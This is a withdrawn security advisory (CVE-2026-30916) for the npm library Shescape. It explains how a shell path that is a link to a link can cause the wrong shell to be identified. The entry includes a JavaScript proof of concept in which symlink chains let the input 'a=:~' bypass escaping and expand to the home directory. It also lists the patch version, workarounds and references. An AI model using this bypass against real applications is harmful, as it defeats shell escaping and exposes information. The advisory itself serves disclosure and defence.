CVE-2026-30916
Withdrawn Advisory: Shescape has possible misidentification of shell due to link chains
Description
## Withdrawn Advisory This advisory has been withdrawn because it falls outside the https://github.com/ericcornelissen/shescape/blob/a2544a1c78cae19d0e81a485b997bf0b0fcc2c12/SECURITY.md#threat-model. This link is maintained to preserve external references. ## Original Description ### Impact This impacts users of Shescape that configure their `shell` to point to a file on disk that is a link to a link. The precise result of being affected depends on the actual shell used and incorrect shell identified by Shescape. In particular, an attacker may be able to bypass escaping for the shell being used. This can result, for example, in exposure of sensitive information, consider the following proof of concept (targeting Shescape v2): ```javascript import fs from "node:fs"; import { exec } from "node:child_process"; import { Shescape } from "shescape"; import which from "which"; /* 1. Set up */ const shell = which.sync("bash"); const linkToShell = "./csh"; const linkToLink = "./link"; fs.rmSync(linkToLink, { force: true }); fs.rmSync(linkToShell, { force: true }); fs.symlinkSync(shell, linkToShell); fs.symlinkSync(linkToShell, linkToLink); /* 2. Misconfiguration */ const execOptions = { shell: linkToLink, }; const shescape = new Shescape({ shell: execOptions.shell, }); /* 3. Payload */ const userInput = "a=:~"; /* 4. Attack example */ exec( `echo Hello ${shescape.escape(userInput)}`, { shell: execOptions.shell }, (error, stdout) => { fs.rmSync(linkToLink); fs.rmSync(linkToShell); if (error) { console.error(`An error occurred: ${error}`); } else { console.log(stdout); // Output: "Hello a=:/home/user" } }, ); ``` ### Patches This problem has been patched in [v2.1.9](https://www.npmjs.com/package/shescape/v/2.1.9) which you can upgrade to now. ### Workarounds If upgrading is not an option, either avoid using a shell or make sure the shell path you use is not a link to a link. ### References - Shescape Pull Request [#2388](https://github.com/ericcornelissen/shescape/pull/2388) - Shescape Release [v2.1.9](https://github.com/ericcornelissen/shescape/releases/tag/v2.1.9) ### For more information - Comment on Pull Request [#2388](https://github.com/ericcornelissen/shescape/pull/2388) - Open an issue at <https://github.com/ericcornelissen/shescape/issues> (New issue > Question)
Affected packages (1)
- npm/shescapefrom 0, < 2.1.9
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P |
References (7)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-30916
- PATCHhttps://github.com/ericcornelissen/shescape
- WEBhttps://github.com/ericcornelissen/shescape/pull/2388
- WEBhttps://github.com/ericcornelissen/shescape/releases/tag/v2.1.9
- WEBhttps://github.com/ericcornelissen/shescape/security/advisories/GHSA-6f6w-6j58-rq76
- WEBhttps://github.com/github/advisory-database/pull/7206
- WEBhttps://www.npmjs.com/package/shescape/v/2.1.9